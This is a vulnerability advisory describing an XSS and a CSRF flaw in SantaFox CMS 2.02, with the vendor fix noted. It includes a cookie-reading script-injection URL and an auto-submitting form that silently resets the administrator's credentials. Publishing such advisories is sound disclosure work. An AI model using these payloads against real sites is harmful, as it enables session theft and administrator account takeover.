Total Tests:

Multiple Vulnerabilities in SantaFox

Advisory ID:HTB22593
Product:SantaFox
Vendor:artprom
Vulnerable Versions:2.02 and probably prior
Tested Version:2.02
Advisory Publication:August 23, 2010 [without technical details]
Vendor Notification:August 23, 2010
Public Disclosure:September 6, 2010
Vulnerability Type:Cross-Site Scripting [CWE-79]
Cross-Site Request Forgery [CWE-352]
CVE References:CVE-2010-3463
CVE-2010-3464
Risk Level:Medium
CVSSv2 Base Scores:4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
Solution Status:Fixed by Vendor
Discovered and Provided:High-Tech Bridge Security Research Lab
 

Advisory Details:

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in SantaFox which could be exploited to perform cross-site scripting and cross-site request forgery attacks.

1) Cross-site scripting (XSS) vulnerability in SantaFox: CVE-2010-3463
The vulnerability exists due to input sanitation error in the "search" parameter in modules/search/search.class.php. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website. Successful exploitation requires that victim is authorized. Successful exploitation requires that victim is logged-in into the application and has access to administrative interface.
Exploitation example:
http://host/search.html?search=1"><script>alert(document.cookie)</script>&x= 0&y=0

2) Cross-site request forgery (CSRF) in SantaFox: CVE-2010-3464
The vulnerability exists due to insufficient validation of the request origin in admin/index.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and change the administrator`s credentials.
Exploitation example:
<form action="http://host/admin/index.php?action=set_left_menu&leftmenu=save_admin &id=-1" method="post" name="main" >
<input type="hidden" name="login" value="Admin" />
<input type="hidden" name="full_name" value="Admin" />
<input type="hidden" name="pass" value="Admin" />
<input type="hidden" name="lang" value="en" />
<input type="hidden" name="codepage" value="" />
<input type="hidden" name="enabled" value="on" />
<input type="hidden" name="select_group[1]" value="on" />
<input type="hidden" name="select_group[2]" value="on" />
</form>
<script>
document.main.submit();
</script>

How to Detect Cross-Site Scripting Vulnerabilities
Website Security Test
  • GDPR & PCI DSS Test
  • Website CMS Security Test
  • CSP & HTTP Headers Check
  • WordPress & Drupal Scanning
Try For Free

Solution:
Upgrade to SantaFox 3.01


References:
[1] High-Tech Bridge Advisory HTB22593 - https://www.immuniweb.com/advisory/HTB22593 - Multiple Vulnerabilities in SantaFox
[2] SantaFox - santafox.ru – SantaFox is a flexible content management system.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.

Have additional information to submit?
Please feel free to send us any additional information related to this Advisory, such as vulnerable versions, additional exploitation details and conditions, patches and other relevant details.
Book a Call Ask a Question
Close
Talk to ImmuniWeb Experts
ImmuniWeb AI Platform
Have a technical question?

Our security experts will answer within
one business day. No obligations.

Have a sales question?
Email:
Tel: +41 22 560 6800 (Switzerland)
Tel: +1 720 605 9147 (USA)
*
*
*
Your data will stay private and confidential